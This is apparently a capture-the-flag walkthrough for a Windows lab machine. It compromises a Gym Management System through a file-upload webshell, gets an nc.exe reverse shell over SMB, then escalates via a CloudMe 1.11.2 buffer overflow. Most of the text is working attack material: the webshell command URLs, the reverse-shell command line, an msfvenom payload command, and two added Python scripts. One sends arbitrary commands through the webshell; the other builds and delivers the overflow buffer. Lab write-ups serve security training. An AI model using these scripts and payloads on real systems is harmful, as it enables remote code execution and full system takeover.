This machine exposes a vulnerable gym management web application on port 8080 that allows remote code execution via a file upload exploit. Initial access is obtained as a Windows user, and privilege escalation is performed by exploiting a buffer overflow in a locally running CloudMe service on port 8888.
Target: 10.10.11.X
Main vector: Gym Management System RCE (file upload)
Privilege escalation: CloudMe 1.11.2 buffer overflow (port 8888)
Web service on port 8080:
http://IP:8080 -> Gym Management System
Searchsploit:
$ searchsploit "gym management" -> Exploit with RCE via file upload (ID 48506)
The exploit is a Python 2 script that uploads a PHP webshell with a double extension to slip past the upload filter, then executes commands through the shell's telepathy GET parameter.
Run the exploit against the target:
$ python2 gym_exploit_rce.py http://IP:8080
The exploit drops the webshell as kamehameha.php under /upload/; commands are passed in the telepathy GET parameter.
Serve tools via SMB from the attacker:
$ impacket-smbserver smbFolder $(pwd) -smb2support
Test command execution:
http://IP:8080/upload/kamehameha.php?telepathy=dir \\KALI_IP\smbFolder
Once command execution is confirmed, host nc.exe on the SMB share and launch it through the webshell to get a reverse shell (the command line needs URL-encoding: spaces, backslashes and & all break the query string otherwise).
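Added example (not part of the original writeup or of exploit 48506): a small helper that builds the telepathy URL with the command percent-encoded and fetches it, so the SMB test and the nc.exe call can be issued without hand-encoding. TARGET, KALI_IP and the nc.exe command line are assumptions; the webshell path /upload/kamehameha.php is the one the page names.

```python
from urllib.parse import quote
from urllib.request import urlopen

# Assumed values: replace with the real target URL and attacker IP.
TARGET = "http://IP:8080"
WEBSHELL = "/upload/kamehameha.php"   # path the exploit drops the shell at (from the page)


def webshell_url(cmd: str, base: str = TARGET, shell: str = WEBSHELL) -> str:
    """Build the command URL with the whole command percent-encoded.

    safe='' also encodes '/' so that backslashes, spaces and '&' in a
    Windows command line cannot be mistaken for query-string syntax.
    """
    return f"{base}{shell}?telepathy={quote(cmd, safe='')}"


def run(cmd: str, timeout: float = 30.0, **kw) -> str:
    """Execute cmd through the webshell and return its output as text."""
    with urlopen(webshell_url(cmd, **kw), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Same check as the page's manual test, now encoded automatically.
    print(run(r"dir \\KALI_IP\smbFolder"))
    # Assumed command line for the reverse shell: nc.exe served from the
    # SMB share, connecting back to the listener on port 4444.
    run(r"\\KALI_IP\smbFolder\nc.exe -e cmd.exe KALI_IP 4444")
```

Start nc -nlvp 4444 before issuing the second command; the request hangs while the shell is alive, which is expected.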
After the reverse shell is established, user.txt is accessible.
Enumeration with winPEAS:
C:\> winPEASx64.exe
winPEAS reveals a running CloudMe instance. CloudMe listens on port 8888 by default.
Confirm locally (the service is bound to the loopback address, so it is only reachable from the box itself or through a port forward):
C:\> netstat -ano | findstr :8888 -> 127.0.0.1:8888 LISTENING
Searchsploit:
$ searchsploit cloudme 1.11.2 -> Exploit ID 48389 (buffer overflow)
A custom Python exploit, adapted from the 48389 proof of concept, triggers the overflow with a reverse shell payload.
The payload is generated with msfvenom; -b excludes the bytes that would truncate or corrupt the buffer (NUL, CR, LF) and EXITFUNC=thread lets the shellcode exit cleanly without killing the CloudMe process:
$ msfvenom -p windows/shell_reverse_tcp LHOST=KALI_IP LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
The shellcode is embedded into bof_exploit.py, which connects to port 8888 and sends the crafted buffer:
    target = "127.0.0.1"
    padding1 = b"\x90" * 1052
    EIP = b"\xB5\x42\xA8\x68"   # 0x68A842B5 -> PUSH ESP; RET (little-endian)
    NOPS = b"\x90" * 30
    buf = (msfvenom shellcode)
After 1052 bytes the saved return address is overwritten; when the function returns, ESP points just past it, at the NOP sled, so a PUSH ESP; RET gadget jumps execution into the sled and on into the shellcode.
The script sends the payload to the CloudMe service. Because the service only listens on 127.0.0.1, it runs either on the target itself or from the attacker through a port forward set up from the foothold; in both cases the target stays 127.0.0.1:
$ python bof_exploit.py
On the attacker side, a listener is waiting:
$ nc -nlvp 4444
When the exploit succeeds, the listener receives a shell with the privileges of the account running CloudMe, a high-privileged (SYSTEM or equivalent) account here, which gives access to root.txt.
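Added example (not the page's bof_exploit.py and not exploit 48389): a Python 3 version of the buffer construction above that packs the return address with struct so the little-endian byte order is not hand-written, checks the payload against the msfvenom bad-char list before sending, and keeps the socket send separate from the build. The shellcode is a constructed 0xCC (INT3) placeholder so the layout can be checked offline; paste the real msfvenom buf in its place. Offset, gadget address, NOP sled length and bad chars are the values from the page; the shellcode length is an assumption.

```python
import socket
import struct

# Layout from the page's notes: 1052 bytes of padding, then the saved
# return address, then a NOP sled, then the shellcode.
OFFSET = 1052
RET_ADDR = 0x68A842B5            # PUSH ESP; RET gadget, as given on the page
NOP_SLED = b"\x90" * 30
BAD_CHARS = b"\x00\x0d\x0a"      # the bytes excluded with msfvenom -b

# Constructed placeholder for the msfvenom output (length is an assumption).
# INT3 bytes make the layout testable offline; a real run uses the real buf.
SHELLCODE = b"\xcc" * 351


def check_bad_chars(payload: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return (offset, byte) pairs in payload that collide with the bad-char list."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def build_buffer(shellcode: bytes = SHELLCODE, offset: int = OFFSET,
                 ret: int = RET_ADDR) -> bytes:
    """Assemble padding + return address + NOP sled + shellcode.

    struct.pack('<I', 0x68A842B5) yields b'\\xb5\\x42\\xa8\\x68', the same
    bytes the page writes out by hand. Everything after the padding is
    checked for bad chars; a hit there would truncate or corrupt the payload.
    """
    eip = struct.pack("<I", ret)
    buf = b"\x90" * offset + eip + NOP_SLED + shellcode
    hits = check_bad_chars(buf[offset:])
    if hits:
        raise ValueError(f"bad chars in payload at {hits[:5]}")
    return buf


def send_buffer(buf: bytes, host: str = "127.0.0.1", port: int = 8888,
                timeout: float = 5.0) -> int:
    """Deliver the buffer to CloudMe; returns the number of bytes sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(buf)
        return len(buf)


if __name__ == "__main__":
    # 127.0.0.1 is correct both when run on the target and when port 8888
    # is forwarded to the attacker's loopback; start the listener first.
    payload = build_buffer()
    print(f"sending {send_buffer(payload)} bytes")
```

If build_buffer raises, regenerate the shellcode with the offending byte added to -b rather than editing the buffer by hand; the gadget address itself contains none of the three bad bytes.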
The machine combines a web application RCE (file upload in Gym Management System) with a local buffer overflow in CloudMe. After gaining a foothold through the webshell, the CloudMe service on port 8888 is exploited using a custom Python buffer overflow script with msfvenom shellcode to obtain full system compromise.